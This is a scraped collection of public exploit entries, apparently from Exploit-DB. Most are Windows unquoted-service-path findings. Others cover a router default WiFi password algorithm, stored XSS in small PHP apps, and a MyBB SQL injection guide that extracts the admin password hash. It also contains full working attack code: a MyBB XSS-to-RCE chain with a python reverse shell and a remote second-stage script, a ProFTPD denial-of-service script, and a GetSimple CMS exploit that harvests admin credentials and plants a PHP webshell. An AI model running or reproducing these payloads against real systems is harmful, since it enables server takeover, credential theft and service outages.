HireHackking

# Exploit Title: Winpakpro 4.8 - 'WPCommandFileService' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-16 # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak # Software Links : https://www.security.honeywell.com/product-repository/winpak # WinPackPro # Tested Version: 4.8 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ WIN-PAK WPCommandFileService WPCommandFileService C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe Auto C:\Users\jorge.irigoyen>sc qc "WPCommandFileService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CtesDurSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START <DELAYED> CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : WIN-PAK Command File Service DEPENDENCIAS : WPDatabaseService NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Winpakpro 4.8 - 'ScheduleService' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-16 # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak # Software Links : https://www.security.honeywell.com/product-repository/winpak # WinPackPro # Tested Version: 4.8 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ WIN-PAK ScheduleService ScheduleService C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe Auto C:\Users\jorge.irigoyen>sc qc "ScheduleService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CtesDurSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START <DELAYED> CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : WIN-PAK Schedule Service DEPENDENCIAS : WPDatabaseService NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 03-19-2020 # Vendor Homepage: https://macpaw.com/encrypto # Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092 # Tested Version: 1.0.1 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Encrypto Service Encrypto.Service C:\Program Files\Encrypto\Encrypto.Service.exe Auto C:\>sc qc "Encrypto.Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Encrypto.Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START (DELAYED) CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Encrypto\Encrypto.Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Encrypto Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device generates its SSID and password based on the WAN MAC address. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5638 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php 03.02.2021 -- Example defaults: # ifconfig |grep HWaddr br0 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D br0:9 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.1 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.100 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.1000 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D eth2.2 Link encap:Ethernet HWaddr 6C:AD:EF:FF:00:01 ra0 Link encap:Ethernet HWaddr 6C:AD:EF:5D:7C:5C rai0 Link encap:Ethernet HWaddr 6C:AD:EF:5E:7C:5C SSID1=MyWiFi-167C5D SSID1=MyWiFi-5G-167C5D WiFi password = EF167C5D

# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path # Exploit Auth: Tech Johnny # Vendor Homepage: https://www.osas.com # Version: 11 x86 # Tested on: Windows 2012R2 Details: C:\Windows\system32>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto C:\Windows\system32>sc.exe qc travextensionhostsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: travextensionhostsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TRAVERSE Automation Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution # Exploit Author: SivertPL (kroppoloe@protonmail.ch) # Date: 19.03.2021 # Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval(). # Software Link: https://resources.mybb.com/downloads/mybb_1825.zip # CVE: CVE-2021-27889, CVE-2021-27890 # Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums # The exploit requires the target administrator to have a valid ACP session. # Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ # Guide: 1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target. document.write('<script src=http://localhost:8000/second_stage.js></script>'); 2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment. You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/ 3) Put the resulting encoded payload in the nested autourl vulnerability vector: [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img] 4) The final payload should look like this: [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img] 5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported. Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP. After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session. 6) Enjoy your RCE! For educational purposes only. const REVERSE_SHELL_IP = "localhost"; const REVERSE_SHELL_PORT = 5554; const PAYLOAD_XML_NAME = "payload"; const PAYLOAD_XML_VERSION = "1821"; const XML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"; const SHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" const SQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- "; // Trigger the actual vulnerability, force cache reload. // Stage: Final function trigger() { var request = new XMLHttpRequest(); request.open('GET', '/index.php'); request.send(); } // Poison the cache. // Stage: 6 function set_as_default(token, tid) { var request = new XMLHttpRequest(); request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token); request.onload = function() { trigger(); }; request.send(); } // Get the TID of the downloaded theme payload // Stage: 5 function get_payload_tid(token) { var request = new XMLHttpRequest(); request.open('GET', '/admin/index.php?module=style-themes'); request.responseType = "document"; request.onload = function() { var response = request.response; var aTags = response.getElementsByTagName("a"); var searchText = "payload"; var found; for (var i = 0; i < aTags.length; i++) { if (aTags[i].textContent == searchText) { found = aTags[i]; break; } } var href = found.getAttribute("href"); var urlParams = new URLSearchParams(href); var tid = urlParams.get("tid"); set_as_default(token, tid); }; request.send(); } // We pass the actual request to upload the template exploiting the second link of the exploit chain // Stage: 4 function upload_template(token) { var request = new XMLHttpRequest(); request.open('POST', '/admin/index.php?module=style-themes&action=import'); var data = new FormData(); data.append('my_post_key', token); data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml"); data.append('import', 0); data.append('url', ''); data.append('tid', '1'); data.append('name', "payload"); data.append("version_compat", 1); data.append("import_stylesheets", 1); data.append("import_templates", 1); request.onload = function() { // After uploading the template, set it as default to poison the cache get_payload_tid(token) }; request.send(data); } // Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation. // Stage: 3 function build_payload() { var xmlDom = document.implementation.createDocument("", "", null); var theme = xmlDom.createElement("theme"); theme.setAttribute("name", PAYLOAD_XML_NAME); theme.setAttribute("version", PAYLOAD_XML_VERSION); var properties = xmlDom.createElement("properties"); theme.appendChild(properties); var template_set = xmlDom.createElement("templateset"); template_set.innerHTML = SQL_PAYLOAD; properties.appendChild(template_set); xmlDom.appendChild(theme); var serialized = new XMLSerializer().serializeToString(xmlDom); var result = XML_PROLOG + serialized; var file = new File([result], PAYLOAD_XML_NAME); return file; } // Acquire the anti-CSRF token // Stage: 2 function acquire_token(request) { var response = request.response; var token = response.getElementsByName("my_post_key")[0].value; if(token == null) { /* ACP Session either expired or wasn't established to begin with */ return; } // We have acquired the anti-CSRF token now. upload_template(token); } // ACP Code Execution // Stage: 1 function exec_acp() { var request = new XMLHttpRequest(); request.open('GET', 'admin/index.php?module=style-themes&action=import'); request.responseType = "document"; request.onload = function() { acquire_token(request); }; request.send(); } // We hide the payload, to raise less suspicions // Stage: 0 function hide() { var getAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']"); getAll.forEach(element => { var pNode = element.parentNode.innerText="lmao whatever you say"; }); } // Entry point of the exploit function start() { hide(); exec_acp(); } start();

# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service # Date: 22/03/2021 # Exploit Author: xynmaps # Vendor Homepage: http://www.proftpd.org/ # Software Link: https://github.com/proftpd/proftpd # Version: 1.3.7a # Tested on: Parrot Security OS 5.9.0 #-------------------------------# #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #ProFTPD Denial of Service exploit by XYN/Dump/NSKB3. """ ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. (if it's limited, just run this script from different proxies using proxychains, and it will work) """ import socket import sys import threading import subprocess import time banner = """ ._________________. | ProFTPD | | D o S | |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_| """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0]) def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop() t = threading.Thread(target=loop, args=(target, port, conns,)) t.start() def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break main()

# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection # Exploit Author: SivertPL (kroppoloe@protonmail.ch) # Date: 20.03.2021 # Description: Lack of sanitization in the "votes[]" parameter in "Edit Poll" causes a second-order semi-blind SQL Injection that is triggered when performing a "Move/Copy" operation on the thread. # Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip # CVE: CVE-2021-27946 References: 1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums 2) https://vuldb.com/?id.171307 3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch In order to trigger the vulnerability, you must have permission to edit polls. Moderators and administrators can usually do it, but in some configurations regular users can do it as well. In case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash. Otherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary injections automatically, and send the resulting hashes to your server. This is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of a very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector. This vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used. In such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash). Guide: 1) Make a thread with a public poll, with multiple choices. 2) Vote on at least one choice. 3) Go to the "Edit poll" section of the poll. 4) Place the following payload in the "vote count" input (any entry within the votes[] parameter in the resulting POST request). 1','2',ascii((select version())),'0','0','1','1') -- -a 5) Save the poll. 6) Perform a "Move/Copy" operation on the thread, moving it to a different forum, or making a copy in the same forum. This is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect. 7) Go to the copied/moved version of the thread (you should be redirected there automatically). 8) Go to the "Show Results" section of the poll. 9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. Since this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()). Other parameters in the INSERT query that we are injecting into are either too small, or unfeasible. Unsigned integer provides enough space to extract required data when enough requests are made. In this case, the number is the ASCII code of the first character of the result of the injected select version() query. This way we can transfer the output through this covert channel, one character at a time. In order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int. 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 2, 1))),'0','0','1','1') -- -a 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 3, 1))),'0','0','1','1') -- -a 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 4, 1))),'0','0','1','1') -- -a 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 5, 1))),'0','0','1','1') -- -a ... etc. This will send the ASCII codes of every char of the hashed password through the integer covert channel. 10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.

# Exploit Title: Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=13707&title=Hotel+and+Lodge+Management+System+using+PHP+with+Source+Code # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Customer Details *Steps to reproduce:* 1: Log in with a valid username and password. Navigate to the Customer Details (http://localhost/hotel/source%20code/index.php) on the left-hand side. 2: Add the new customer and then add the payload <script>alert(document.cookie)</script>in Customer Name parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time when you click view customer and the attacker can steal authenticated users' cookies.

# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path # Exploit Author : SamAlucard # Exploit Date: 2021-03-21 # Software Version : ActivIdentity 8.2 # Vendor Homepage : https://www.hidglobal.com/ # Tested on OS: Windows 7 Pro # ActivIdentity was Acquired by HID Global in Octuber 2010 #ActivClient is a desktop authentication software that uses smarts cards and readers # for enterprise, government and commercial establishments #Analyze PoC : ============== C:\Users\DSAdsi>sc qc ac.sharedstore [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ac.sharedstore TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe GRUPO_ORDEN_CARGA : SmartCardGroup ETIQUETA : 0 NOMBRE_MOSTRAR : ActivIdentity Shared Store Service DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path # Exploit Author : SamAlucard # Exploit Date: 2021-03-22 # Vendor : ELAN Microelectronics # Version : ELAN Touchpad 15.2.13.1_X64_WHQL # Vendor Homepage : http://www.emc.com.tw/ # Tested on OS: Windows 8 #This software installs EDTService.exe, version 11.10.2.1 #Analyze PoC : ============== C:\>sc qc ETDService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ETDService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Elan Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path # Dicovery by: Ekrem Can Kök # Discovery Date: 2021-03-22 # Vendor Homepage: https://www.hirezstudios.com # Version: 5.1.6.3 # Tested on: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\" | findstr /i "HiPatchService" | findstr /i /v """ Hi-Rez Studios Authenticate and Update Service HiPatchService C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe Auto # Service info: C:\>sc qc "HiPatchService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HiPatchService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Hi-Rez Studios Authenticate and Update Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Customer Details *Steps to reproduce:* Add Budget Title Payload : <script>alert(1)</script> Reload the http://localhost/Budget%20Management%20System/index.php or update the budget , the xss will get triggered.

# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE # Exploit Author: Bobby Cooke (boku) # Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: March 29th, 2021 # CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839 # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download/ # Version: v3.3.16 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge # Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839 # Vulnerability Description: # GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket. # Exploit Description: # This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system. # Attack Chain: # 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit # 2. Admin then enters their credentials into the GetSimple CMS login portal # 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter # 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel # 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS # 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS # 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned # 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console import sys,re,argparse,requests from urllib.parse import quote from colorama import (Fore as F, Back as B, Style as S) from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G') def webshell(SERVER_URL): try: WEB_SHELL = SERVER_URL getdir = {'FierceGodKick': 'echo %CD%'} r = requests.post(url=WEB_SHELL, data=getdir, verify=False) status = r.status_code cwd = re.findall(r'[CDEF].*', r.text) if cwd: cwd = cwd[0]+"> " term = SB+FG+cwd+FT print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST) while True: thought = input(term) command = {'FierceGodKick': thought} r = requests.post(WEB_SHELL, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) else: r.raise_for_status() except: pass def urlEncode(javascript): return quote(javascript) def genXssPayload(): XSS_PAYLOAD = '/index/javascript:' XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");' XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";' XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};' XSS_PAYLOAD += 'var user = document.forms[0][0].value;' XSS_PAYLOAD += 'var pass = document.forms[0][1].value;' XSS_PAYLOAD += 'var u1 = s+"admin"+s;' XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";' XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();' XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();' XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();' XSS_PAYLOAD += 'xhr1.open("POST",u1,true);' XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);' XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";' XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){' XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {' XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){' XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {' XSS_PAYLOAD += 'r=this.responseXML;' XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;' XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;' XSS_PAYLOAD += 'xhr3.open("POST",u2,true);' XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);' XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");' XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";' XSS_PAYLOAD += 'xhr3.send(params);' XSS_PAYLOAD += '}};' XSS_PAYLOAD += 'xhr2.open("GET",u2,true);' XSS_PAYLOAD += 'xhr2.responseType="document";' XSS_PAYLOAD += 'xhr2.send();' XSS_PAYLOAD += '}};' XSS_PAYLOAD += 'xhr1.send(params);' XSS_PAYLOAD += '%2f%2f' return XSS_PAYLOAD def argsetup(): about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST parser = argparse.ArgumentParser(description=about) parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site') args = parser.parse_args() return args if __name__ == "__main__": print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB) print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT) print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST) args = argsetup() RHOST = args.TargetSite WEBAPP_URL = RHOST+'/admin/' WEBAPP_URL = WEBAPP_URL+'index.php' PAYLOAD = genXssPayload() ENCODED_PAYLOAD = urlEncode(PAYLOAD) print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST) print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST) sleep(1) print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..') while True: sleep(1) webshell(RHOST)

